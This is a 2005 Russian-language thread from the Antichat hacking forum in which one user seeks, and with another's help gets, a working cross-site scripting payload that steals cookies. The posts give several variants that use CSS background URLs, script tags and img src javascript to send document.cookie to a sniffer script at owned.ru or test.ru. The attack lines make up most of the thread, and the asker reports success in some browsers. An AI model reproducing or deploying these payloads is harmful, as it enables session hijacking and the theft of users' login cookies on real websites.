ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Правильный запрос к javascript
  #1  
Старый 06.10.2005, 03:44
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию Правильный запрос к javascript

Ни как ни могу коректно составить запрос javascript

нужно чтоб работало вот это:

<span style=background:url(javascript:document.images[1].src="http://owned.ru/snif.php?"+document.cookie) > </span>

всё перепробовал, ну ни как не получается...

Был совет сделать такой запрос

<span style=background:url("http://owned.ru/snif.php?"+document.cookie) > </span>

В принципе он работает, но по понятным причинам куки не передаёт....

Сразу скажу, что

<script>img = new Image(); img.src =" http://owned.ru/snif.php?"+document.cookie;</script>

пашет отлично....

ЗЫ:

кстати алерт в
<span style=background:url(javascript:alert())> </span>
выводился у меня токо в какой-то старой версии explorera


Заранее спасибо за либую инфу!
 
Ответить с цитированием

  #2  
Старый 07.10.2005, 06:09
Аватар для Morph
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

А у тя какой браузер?
Данный код посути должен работать в ИЕ.
В остальных нет.
 
Ответить с цитированием

  #3  
Старый 07.10.2005, 12:35
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

пробовал в ie70, mozzila 1.7.8, opera7.0 - не работает

нарыл какой-то smartexplorer 1.1.8 - там работает токо

<span style=background:url(javascript:alert())><span>

но если написать

<span style=background:url(document.images[1].src="http://test.ru/snif.php?"+document.cookie)></span>

он выдаёт критическую ошибку и вылетает(((

Нашёл в инете, что это должно работать в
Applied By

Win IE 5.0 - 6.x
OSX IE 5.x
Mac IE 4.0 - 5.x
Mac IE 4.0 may show a "low system memory" message.

Win Opera 7.0 - 7.x
MSN for OSX
OSX iCab 2.x

Not Applied By

All Mozilla 0.6 - 1.6
Win IE 4.0
All NS 4.05 - 4.x
Win Opera 3.5 - 6.x
OSX/Mac Opera 5.0 - 6.x
OSX Safari 1.x
Konqueror 2.2 - 3.x

согласно этому в Opere 7.0 работать должно, но повторюсь: непашет....

В чём дело?
 
Ответить с цитированием

  #4  
Старый 07.10.2005, 12:40
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Можно через IMG/// <img src=[JAVASCRIPT]>
 
Ответить с цитированием

  #5  
Старый 07.10.2005, 12:52
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

пробовал тоже самое....

Есть идея передать переменную document.cookie после ввода адреса снифа:

<span style=background:url("http://test.ru/snif.php?"+document.cookie)></span>

Снифер запускается (наконец-то), но передаётся в него не значение кукисов, а как раз то что написано далее: \"+document.cookie

пробовал писать

<span style=background:url("http://test.ru/snif.php?"+javascript:document.write(document.cook ie))></span>

передаётся \"+javascript:document.write(document.cookie)

Помогите очень прошу!
 
Ответить с цитированием

  #6  
Старый 07.10.2005, 12:56
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

А порчему именно Span ???
 
Ответить с цитированием

  #7  
Старый 07.10.2005, 13:04
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

да мона и <img src....>
Всё перепробовал. не работает
 
Ответить с цитированием

  #8  
Старый 07.10.2005, 13:09
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Kond4r  
да мона и <img src....>
Всё перепробовал. не работает
Попробуй так:

<img src="javascript:img = new Image(); img.src ='http://owned.ru/snif.php?'+document.cookie;">
 
Ответить с цитированием

  #9  
Старый 07.10.2005, 13:28
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Заработало!!!)))))
Прада токо в smartexplorer
В IE7.0 не работает
В Mozzile не передаётся document.cookie

Спасибо огромное...
Дальше я сам наверно разберусь.
Хотя если есть какие-то идеи буду признателен.
>bull666
Огромное спасибо!
 
Ответить с цитированием

  #10  
Старый 07.10.2005, 21:15
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

было дело


Всем спасибо сам намыл инфу.... Всё работает и <span> в том числе.)))

Последний раз редактировалось Kond4r; 08.10.2005 в 14:01..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books JS FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:57
Bypassing JavaScript Filters the Flash! Attack k00p3r Чужие Статьи 0 12.07.2005 16:11
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ